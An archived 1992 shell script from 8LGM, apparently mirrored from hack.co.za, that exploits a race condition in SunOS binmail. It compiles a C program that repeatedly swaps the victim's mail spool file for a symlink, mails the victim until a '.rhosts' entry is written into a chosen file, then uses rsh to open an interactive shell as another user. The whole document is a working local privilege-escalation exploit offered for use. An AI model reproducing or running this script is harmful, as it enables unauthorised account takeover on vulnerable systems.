home *** CD-ROM | disk | FTP | other *** search
- #!/bin/sh
- #
- # Syntax: mailscript user target-file rsh-user
- #
- # This exploits a flaw in SunOS binmail(1), and attempts
- # to become the specified 'user', by creating a .rhosts
- # file and using rsh.
- #
- # Written 1992 by [8LGM]
- # Please do not use this script without permission.
- #
- PATH=/usr/ucb:/usr/bin:/bin export PATH
- IFS=" " export IFS
-
- PROG="`basename $0`"
- SPOOLDIR="/var/spool/mail"
-
- # Check args
- if [ $# -ne 3 ]; then
- echo "Syntax: $PROG user target-file rsh-user"
- exit 1
- fi
- TARGET="$1"
- TARGET_FILE="$2"
- RSH_USER="$3"
-
- # Check we're on SunOS
- if [ "x`uname -s`" != "xSunOS" ]; then
- echo "Sorry, this only works on SunOS"
- exit 1
- fi
-
- # Check user exists
- grep "^$TARGET:" /etc/passwd >/dev/null 2>&1
- if [ $? -ne 0 ]; then
- echo "$PROG: Warning, $TARGET not in local passwd file"
- [2000]# We continue though, might be in the YP passwd file
- fi
-
- # Check target file
- if [ -f $TARGET_FILE ]; then
- OLD_TARGET_LEN=`ls -ld $TARGET_FILE | awk -F' ' '{print $4}'` 2>/dev/null
- echo "$PROG: Warning, $TARGET_FILE already exists, appending"
- else
- OLD_TARGET_LEN=0
- fi
-
- # Delete spool file if its a link, and we are able
- if [ -h "$SPOOLDIR/$TARGET" ]; then
- rm -f "$SPOOLDIR/$TARGET"
- [2000]# Dont worry about errors, we catch it below
- fi
-
- # Check mail file
- if [ -f "$SPOOLDIR/$TARGET" ]; then
- echo "$PROG: ${TARGET}'s mail file exists."
- exit 1
- fi
-
- # Make the race program
- cat >mailrace.c << 'EOF'
- #include <stdio.h>
-
- main(argc,argv)
- int argc;
- char *argv[];
- {
- if (argc != 3) {
- fprintf(stderr, "Usage: %s mailfile newfile\n", argv[0]);
- exit(1);
- }
-
- for (;;) {
- unlink(argv[1]);
- symlink(argv[2], argv[1]);
- }
- }
- EOF
- cc -o mailrace mailrace.c
-
- # Check we now have mailrace
- if [ ! -x "mailrace" ]; then
- echo "$PROG: couldnt compile mailrace.c - check it out"
- exit 1
- fi
-
- # Start mailrace
- ./mailrace $SPOOLDIR/$TARGET $TARGET_FILE &
- RACE_PID=$!
-
- # Send mail to the user
- NEW_TARGET_LEN=$OLD_TARGET_LEN
- while [ "x$NEW_TARGET_LEN" = "x$OLD_TARGET_LEN" ]; do
- echo "Sending mail to $TARGET"
- echo "localhost $USER" | /bin/mail $TARGET
- sleep 10
- kill -STOP $RACE_PID
- rm -f $SPOOLDIR/$TARGET >/dev/null 2>&1
- if [ -f $SPOOLDIR/$TARGET ]; then
- echo "$PROG: Sorry, we lost the race - cant try again."
- kill -9 $RACE_PID
- exit 1
- fi
- kill -CONT $RACE_PID
- if [ -f "$TARGET_FILE" ]; then
- NEW_TARGET_LEN=`ls -ld $TARGET_FILE | awk -F' ' '{print $4}'` 2>/dev/null
- else
- NEW_TARGET_LEN=0
- fi
- if [ "x$NEW_TARGET_LEN" = "x$OLD_TARGET_LEN" ]; then
- echo "We drew the race that time, trying again"
- fi
- done
-
- # We won the race
- kill -9 $RACE_PID
- echo "We won the race, becoming $RSH_USER"
- rsh localhost -l $RSH_USER sh -i
- exit 0
-
- # www.hack.co.za [2000]#